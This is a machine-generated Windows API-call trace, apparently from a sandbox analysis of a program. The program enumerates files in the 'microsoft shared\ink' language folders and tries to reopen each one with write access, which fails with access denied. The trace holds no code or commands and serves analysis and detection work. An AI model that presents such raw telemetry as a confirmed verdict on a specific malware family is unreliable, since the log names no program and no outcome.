RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.005] AreFileApisANSI () returned 1 [0099.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0099.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0099.005] AreFileApisANSI () returned 1 [0099.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85080 [0099.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 73 [0099.005] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.005] GetFileType (hFile=0x418) returned 0x1 [0099.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0099.005] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.006] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.006] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.006] CloseHandle (hObject=0x418) returned 1 [0099.006] AreFileApisANSI () returned 1 [0099.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x856c0 [0099.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 73 [0099.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.006] GetLastError () returned 0x5 [0099.006] GetLastError () returned 0x5 [0099.006] SetLastError (dwErrCode=0x5) [0099.006] GetLastError () returned 0x5 [0099.006] SetLastError (dwErrCode=0x5) [0099.006] GetLastError () returned 0x5 [0099.006] SetLastError (dwErrCode=0x5) [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0099.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.007] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0099.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.008] AreFileApisANSI () returned 1 [0099.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0099.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0099.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.008] AreFileApisANSI () returned 1 [0099.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0099.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned 72 [0099.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.008] GetFileType (hFile=0x418) returned 0x1 [0099.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0099.008] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.009] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.009] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.009] CloseHandle (hObject=0x418) returned 1 [0099.009] AreFileApisANSI () returned 1 [0099.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0099.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned 72 [0099.009] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.009] GetLastError () returned 0x5 [0099.009] GetLastError () returned 0x5 [0099.009] SetLastError (dwErrCode=0x5) [0099.009] GetLastError () returned 0x5 [0099.009] SetLastError (dwErrCode=0x5) [0099.009] GetLastError () returned 0x5 [0099.009] SetLastError (dwErrCode=0x5) [0099.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0099.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.010] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x8e, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x853a8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x8e, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧฀")) returned 0 [0099.010] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0099.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f90 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0099.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0099.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0099.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0099.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0099.011] AreFileApisANSI () returned 1 [0099.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES", lpUsedDefaultChar=0x0) returned 57 [0099.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.011] AreFileApisANSI () returned 1 [0099.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0099.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES") returned 57 [0099.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.011] GetLastError () returned 0x5 [0099.011] GetLastError () returned 0x5 [0099.011] SetLastError (dwErrCode=0x5) [0099.011] GetLastError () returned 0x5 [0099.011] SetLastError (dwErrCode=0x5) [0099.011] GetLastError () returned 0x5 [0099.012] SetLastError (dwErrCode=0x5) [0099.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0099.012] AreFileApisANSI () returned 1 [0099.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0099.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES") returned 57 [0099.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.012] GetLastError () returned 0x5 [0099.012] GetLastError () returned 0x5 [0099.012] SetLastError (dwErrCode=0x5) [0099.012] GetLastError () returned 0x5 [0099.012] SetLastError (dwErrCode=0x5) [0099.012] GetLastError () returned 0x5 [0099.012] SetLastError (dwErrCode=0x5) [0099.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0099.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.012] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="es-MX", cAlternateFileName="")) returned 1 